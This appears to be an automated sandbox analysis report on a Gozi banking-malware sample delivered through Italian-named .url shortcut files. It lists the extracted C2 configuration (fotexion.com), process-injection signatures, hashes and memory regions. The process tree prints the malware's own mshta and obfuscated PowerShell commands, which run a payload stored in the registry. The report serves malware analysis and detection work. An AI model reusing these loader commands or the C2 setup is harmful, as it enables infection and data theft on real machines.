Overview
overview
10Static
static
1url/Ammini...ne.url
windows10-1703-x64
10url/Ammini...ne.url
windows10-2004-x64
10url/Azienda.url
windows10-1703-x64
10url/Azienda.url
windows10-2004-x64
10url/Cliente.url
windows10-1703-x64
10url/Cliente.url
windows10-2004-x64
10url/Documenti.url
windows10-1703-x64
10url/Documenti.url
windows10-2004-x64
10url/Informazioni.url
windows10-1703-x64
10url/Informazioni.url
windows10-2004-x64
10url/dettagli.url
windows10-1703-x64
10url/dettagli.url
windows10-2004-x64
10url/inform.url
windows10-1703-x64
10url/inform.url
windows10-2004-x64
10url/modulo.url
windows10-1703-x64
10url/modulo.url
windows10-2004-x64
10url/processo.url
windows10-1703-x64
10url/processo.url
windows10-2004-x64
10url/sistema.url
windows10-1703-x64
10url/sistema.url
windows10-2004-x64
10Analysis
-
max time kernel
157s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
13-10-2023 01:40
Static task
static1
Behavioral task
behavioral1
Sample
url/Amministrazione.url
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
url/Amministrazione.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
url/Azienda.url
Resource
win10-20230915-en
Behavioral task
behavioral4
Sample
url/Azienda.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
url/Cliente.url
Resource
win10-20230915-en
Behavioral task
behavioral6
Sample
url/Cliente.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
url/Documenti.url
Resource
win10-20230915-en
Behavioral task
behavioral8
Sample
url/Documenti.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
url/Informazioni.url
Resource
win10-20230915-en
Behavioral task
behavioral10
Sample
url/Informazioni.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
url/dettagli.url
Resource
win10-20230831-en
Behavioral task
behavioral12
Sample
url/dettagli.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
url/inform.url
Resource
win10-20230915-en
Behavioral task
behavioral14
Sample
url/inform.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
url/modulo.url
Resource
win10-20230915-en
Behavioral task
behavioral16
Sample
url/modulo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
url/processo.url
Resource
win10-20230915-en
Behavioral task
behavioral18
Sample
url/processo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
url/sistema.url
Resource
win10-20230915-en
General
-
Target
url/Cliente.url
-
Size
194B
-
MD5
0da2f6812c1bc76eaa25be1e6a2eaf4c
-
SHA1
e4b237e5f7bb7b96e9bfb43c126541fc892d3b0a
-
SHA256
0042887574aae1f954f0459b9448c0fa4501bb8719843940315d466645da9a7b
-
SHA512
a5495580fae00444b4edbff6894e1e302025ddff295a26fe519bc229724d3961646afb1cece2be892b19840035152a937fa3f7910e4fe04adea751eb319d96cb
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 54 1984 rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exemshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1984 rundll32.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEdescription pid process target process PID 1984 set thread context of 3016 1984 rundll32.exe control.exe PID 3016 set thread context of 3168 3016 control.exe Explorer.EXE PID 3168 set thread context of 3728 3168 Explorer.EXE RuntimeBroker.exe PID 3168 set thread context of 4056 3168 Explorer.EXE RuntimeBroker.exe PID 3016 set thread context of 1268 3016 control.exe rundll32.exe PID 3168 set thread context of 4912 3168 Explorer.EXE RuntimeBroker.exe PID 3168 set thread context of 2956 3168 Explorer.EXE RuntimeBroker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 1984 rundll32.exe 1984 rundll32.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE 3168 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3168 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEpid process 1984 rundll32.exe 3016 control.exe 3168 Explorer.EXE 3168 Explorer.EXE 3016 control.exe 3168 Explorer.EXE 3168 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 3336 powershell.exe Token: SeShutdownPrivilege 3168 Explorer.EXE Token: SeCreatePagefilePrivilege 3168 Explorer.EXE Token: SeShutdownPrivilege 3168 Explorer.EXE Token: SeCreatePagefilePrivilege 3168 Explorer.EXE Token: SeShutdownPrivilege 3168 Explorer.EXE Token: SeCreatePagefilePrivilege 3168 Explorer.EXE Token: SeShutdownPrivilege 3168 Explorer.EXE Token: SeCreatePagefilePrivilege 3168 Explorer.EXE Token: SeShutdownPrivilege 3168 Explorer.EXE Token: SeCreatePagefilePrivilege 3168 Explorer.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 5116 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3168 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3168 Explorer.EXE -
Suspicious use of WriteProcessMemory 55 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exerundll32.execontrol.exeExplorer.EXEdescription pid process target process PID 5116 wrote to memory of 3968 5116 rundll32.exe control.exe PID 5116 wrote to memory of 3968 5116 rundll32.exe control.exe PID 3968 wrote to memory of 3056 3968 control.exe rundll32.exe PID 3968 wrote to memory of 3056 3968 control.exe rundll32.exe PID 3056 wrote to memory of 1984 3056 rundll32.exe rundll32.exe PID 3056 wrote to memory of 1984 3056 rundll32.exe rundll32.exe PID 3056 wrote to memory of 1984 3056 rundll32.exe rundll32.exe PID 5052 wrote to memory of 3336 5052 mshta.exe powershell.exe PID 5052 wrote to memory of 3336 5052 mshta.exe powershell.exe PID 3336 wrote to memory of 1960 3336 powershell.exe csc.exe PID 3336 wrote to memory of 1960 3336 powershell.exe csc.exe PID 1960 wrote to memory of 3064 1960 csc.exe cvtres.exe PID 1960 wrote to memory of 3064 1960 csc.exe cvtres.exe PID 3336 wrote to memory of 3452 3336 powershell.exe csc.exe PID 3336 wrote to memory of 3452 3336 powershell.exe csc.exe PID 3452 wrote to memory of 4948 3452 csc.exe cvtres.exe PID 3452 wrote to memory of 4948 3452 csc.exe cvtres.exe PID 1984 wrote to memory of 3016 1984 rundll32.exe control.exe PID 1984 wrote to memory of 3016 1984 rundll32.exe control.exe PID 1984 wrote to memory of 3016 1984 rundll32.exe control.exe PID 1984 wrote to memory of 3016 1984 rundll32.exe control.exe PID 1984 wrote to memory of 3016 1984 rundll32.exe control.exe PID 3336 wrote to memory of 3168 3336 powershell.exe Explorer.EXE PID 3336 wrote to memory of 3168 3336 powershell.exe Explorer.EXE PID 3016 wrote to memory of 3168 3016 control.exe Explorer.EXE PID 3016 wrote to memory of 3168 3016 control.exe Explorer.EXE PID 3016 wrote to memory of 3168 3016 control.exe Explorer.EXE PID 3016 wrote to memory of 3168 3016 control.exe Explorer.EXE PID 3168 wrote to memory of 3728 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 3728 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 3728 3168 Explorer.EXE RuntimeBroker.exe PID 3016 wrote to memory of 1268 3016 control.exe rundll32.exe PID 3016 wrote to memory of 1268 3016 control.exe rundll32.exe PID 3016 wrote to memory of 1268 3016 control.exe rundll32.exe PID 3168 wrote to memory of 3728 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 4056 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 4056 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 4056 3168 Explorer.EXE RuntimeBroker.exe PID 3016 wrote to memory of 1268 3016 control.exe rundll32.exe PID 3168 wrote to memory of 4056 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 4912 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 4912 3168 Explorer.EXE RuntimeBroker.exe PID 3016 wrote to memory of 1268 3016 control.exe rundll32.exe PID 3168 wrote to memory of 4912 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 4912 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 2956 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 2956 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 2956 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 2956 3168 Explorer.EXE RuntimeBroker.exe PID 3168 wrote to memory of 5012 3168 Explorer.EXE cmd.exe PID 3168 wrote to memory of 5012 3168 Explorer.EXE cmd.exe PID 3168 wrote to memory of 5012 3168 Explorer.EXE cmd.exe PID 3168 wrote to memory of 5012 3168 Explorer.EXE cmd.exe PID 3336 wrote to memory of 3168 3336 powershell.exe Explorer.EXE PID 3168 wrote to memory of 5012 3168 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\Cliente.url1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl",2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cpl",4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h6⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>D7t3='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(D7t3).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jsmcpjdr -value gp; new-alias -name drhbicx -value iex; drhbicx ([System.Text.Encoding]::ASCII.GetString((jsmcpjdr "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8AA7.tmp" "c:\Users\Admin\AppData\Local\Temp\cgc4erki\CSC67DB7438947B4F56824E70A127ABEA65.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B03.tmp" "c:\Users\Admin\AppData\Local\Temp\veri0dji\CSC33D98D6E85314687A14F1BBD45EAE191.TMP"5⤵
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cplFilesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\QHTO49S3\sistema[1].cplFilesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
C:\Users\Admin\AppData\Local\Temp\RES8AA7.tmpFilesize
1KB
MD5161b212865a932a6b09844c3724a8971
SHA18d622efeddb67fb207a6e3b8741c1b6261679158
SHA2562cfffb223c75932f843232a8d66c45d0eec8e87d8e3bc3097e606231762e0a15
SHA51261cace837ca81c8dc845d23de056c6de1d19bd35b201acfa5f42d4b0fc64c3ed92771fda69c91faa86133c007b5e586f308efab614b950254e8c00315a7611fa
-
C:\Users\Admin\AppData\Local\Temp\RES9B03.tmpFilesize
1KB
MD523b5e5597f4ef7384d553b143765ef4b
SHA15a0636d36a36fb941e91287e02e8d8c5df344d64
SHA25688c13fcb4a848ed53031ecd0cc6f06fd4e1cab0961afdfb4fd4ef21a8aa96de0
SHA51219e61b472817dbae7e9da7ae9482b8210a0a88801a06f56a315372946a3e1acc4ef2d637027b877d07a9ff03b21ae1bcc9cf2b6ecbeaacf0323d39b52a6556e3
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uypvh0cb.rnf.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.dllFilesize
3KB
MD55dd8265f6ed4998900701fd7649bc959
SHA13ee50bff0d4723ec9343dafe7756f1147de9977f
SHA256e52f52dcb198719c55082c6ab52fe7998785584544589beb6781361c219923e0
SHA512e1e6d64a87912e024f369214b56fa06377fe0deed25e40e2880cb4b5250e90f6ea7f7245a049101a85d87a9af6b333fd16430d3df8de756a3a100c6eb693acaa
-
C:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.dllFilesize
3KB
MD59435366efd555f9ee036080f02f9c0df
SHA1e4b119c1090361ef1fedad82a4561411a3b3f60b
SHA256c4682afde7b9b640cd76eb6f684eb9d80399ed980b05f2c0ae8291bf1222cbe5
SHA51231060579eef95224b2441795a7a044979403c4d3609718ecfae6809d8dc2ab81216de1ed7b4c099513985ce290dcfe2c92035d3168dba5dcdc3a8a00996a9b55
-
\??\c:\Users\Admin\AppData\Local\Temp\cgc4erki\CSC67DB7438947B4F56824E70A127ABEA65.TMPFilesize
652B
MD5087f81115e78b64e98f4e410b2b75e18
SHA14cb418f0cc132da4c858ceeb13d943f913e3a375
SHA2566d0a3f0dd4cc0dcbb7add4d87899eb30a4b8183e4e431d824ed34525c5e4e792
SHA51206f95142be5326755e09516009f1309626ef52b58cde6b6299c244794f7767f3aedcda006adb14a3fdb52fa01ced125ae278eaafc190f456220851b53d4e7a7c
-
\??\c:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\cgc4erki\cgc4erki.cmdlineFilesize
369B
MD55044a4e84c8f7fba8b6760d09b5954c1
SHA1c0035f8905c44bb65892b3801d7b71d30977b908
SHA256b275381bf834b86e71067f268f7d81d98ce2b2466994f02e02907fcd5d5ba774
SHA512ae9d6a12d778a9ec8cd8d153d7934164c26bd211c4216e78e0070a7f65042b24375e0060fff4cd441dcfced921bebaedf7a777ac4dce2f8c6a53a468c012fcd4
-
\??\c:\Users\Admin\AppData\Local\Temp\veri0dji\CSC33D98D6E85314687A14F1BBD45EAE191.TMPFilesize
652B
MD5f983b6113f49b9395213b8e730162d07
SHA1b576f4c828a9103301b5b45780436281e6a4093b
SHA2565763fcbe003c695e3570bf044fbb1b04b26e2a5a409503a53018c7564aa86af4
SHA5122e5539cbf31cc14418cafd23437994b541111e2ae0181f97035a2ff969090a6f646f221f96e2fafd1d59d8788338386dfd16a3bbee0e69c38f0d3764ea1940cf
-
\??\c:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\veri0dji\veri0dji.cmdlineFilesize
369B
MD5f4f4637bd5cc5e1d13d21c1dc7d26604
SHA1e93b0640eb7e09f5c42ae4e08e55ce1b709807f8
SHA25656a55ed5237e03ada2dfbaf42471cea84c6e9a9e564dd8c0ebaeeca21bc8fbb0
SHA5120f3755dfb240efb71a490ee77c219ce3eb222aa1384cf8a037946bf85a7300cf4cda01910f3df13a360ba2387efd0aba60c9a72e8965794846325c636509d1a4
-
memory/1268-90-0x000002437A5B0000-0x000002437A5B1000-memory.dmpFilesize
4KB
-
memory/1268-108-0x000002437A8A0000-0x000002437A944000-memory.dmpFilesize
656KB
-
memory/1268-82-0x000002437A8A0000-0x000002437A944000-memory.dmpFilesize
656KB
-
memory/1984-116-0x00000000020B0000-0x00000000020BE000-memory.dmpFilesize
56KB
-
memory/1984-11-0x00000000020B0000-0x00000000020BE000-memory.dmpFilesize
56KB
-
memory/1984-8-0x00000000020D0000-0x00000000020DD000-memory.dmpFilesize
52KB
-
memory/1984-7-0x00000000020B0000-0x00000000020BE000-memory.dmpFilesize
56KB
-
memory/1984-6-0x0000000002070000-0x0000000002099000-memory.dmpFilesize
164KB
-
memory/2956-101-0x000001773DC10000-0x000001773DCB4000-memory.dmpFilesize
656KB
-
memory/2956-105-0x000001773DCC0000-0x000001773DCC1000-memory.dmpFilesize
4KB
-
memory/2956-119-0x000001773DC10000-0x000001773DCB4000-memory.dmpFilesize
656KB
-
memory/3016-83-0x00000000004B0000-0x0000000000554000-memory.dmpFilesize
656KB
-
memory/3016-109-0x00000000004B0000-0x0000000000554000-memory.dmpFilesize
656KB
-
memory/3016-60-0x00000000004B0000-0x0000000000554000-memory.dmpFilesize
656KB
-
memory/3016-61-0x0000000000560000-0x0000000000561000-memory.dmpFilesize
4KB
-
memory/3168-67-0x0000000008AD0000-0x0000000008B74000-memory.dmpFilesize
656KB
-
memory/3168-114-0x0000000008AD0000-0x0000000008B74000-memory.dmpFilesize
656KB
-
memory/3168-68-0x00000000029F0000-0x00000000029F1000-memory.dmpFilesize
4KB
-
memory/3336-30-0x0000024075FF0000-0x0000024076000000-memory.dmpFilesize
64KB
-
memory/3336-31-0x0000024075FF0000-0x0000024076000000-memory.dmpFilesize
64KB
-
memory/3336-13-0x0000024075AF0000-0x0000024075B12000-memory.dmpFilesize
136KB
-
memory/3336-23-0x00007FFA9AC20000-0x00007FFA9B6E1000-memory.dmpFilesize
10.8MB
-
memory/3336-25-0x0000024075FF0000-0x0000024076000000-memory.dmpFilesize
64KB
-
memory/3336-57-0x0000024075FE0000-0x0000024075FE8000-memory.dmpFilesize
32KB
-
memory/3336-43-0x0000024075950000-0x0000024075958000-memory.dmpFilesize
32KB
-
memory/3336-113-0x0000024076100000-0x000002407613D000-memory.dmpFilesize
244KB
-
memory/3336-112-0x00007FFA9AC20000-0x00007FFA9B6E1000-memory.dmpFilesize
10.8MB
-
memory/3336-32-0x0000024075FF0000-0x0000024076000000-memory.dmpFilesize
64KB
-
memory/3336-24-0x0000024075FF0000-0x0000024076000000-memory.dmpFilesize
64KB
-
memory/3336-65-0x0000024076100000-0x000002407613D000-memory.dmpFilesize
244KB
-
memory/3336-103-0x0000024076100000-0x000002407613D000-memory.dmpFilesize
244KB
-
memory/3336-27-0x00007FFA9AC20000-0x00007FFA9B6E1000-memory.dmpFilesize
10.8MB
-
memory/3336-26-0x0000024075FF0000-0x0000024076000000-memory.dmpFilesize
64KB
-
memory/3728-115-0x00000269E0520000-0x00000269E05C4000-memory.dmpFilesize
656KB
-
memory/3728-76-0x00000269E04E0000-0x00000269E04E1000-memory.dmpFilesize
4KB
-
memory/3728-75-0x00000269E0520000-0x00000269E05C4000-memory.dmpFilesize
656KB
-
memory/4056-86-0x0000026106A50000-0x0000026106A51000-memory.dmpFilesize
4KB
-
memory/4056-81-0x0000026106A90000-0x0000026106B34000-memory.dmpFilesize
656KB
-
memory/4056-117-0x0000026106A90000-0x0000026106B34000-memory.dmpFilesize
656KB
-
memory/4912-98-0x000001AF0FFD0000-0x000001AF0FFD1000-memory.dmpFilesize
4KB
-
memory/4912-94-0x000001AF121D0000-0x000001AF12274000-memory.dmpFilesize
656KB
-
memory/4912-118-0x000001AF121D0000-0x000001AF12274000-memory.dmpFilesize
656KB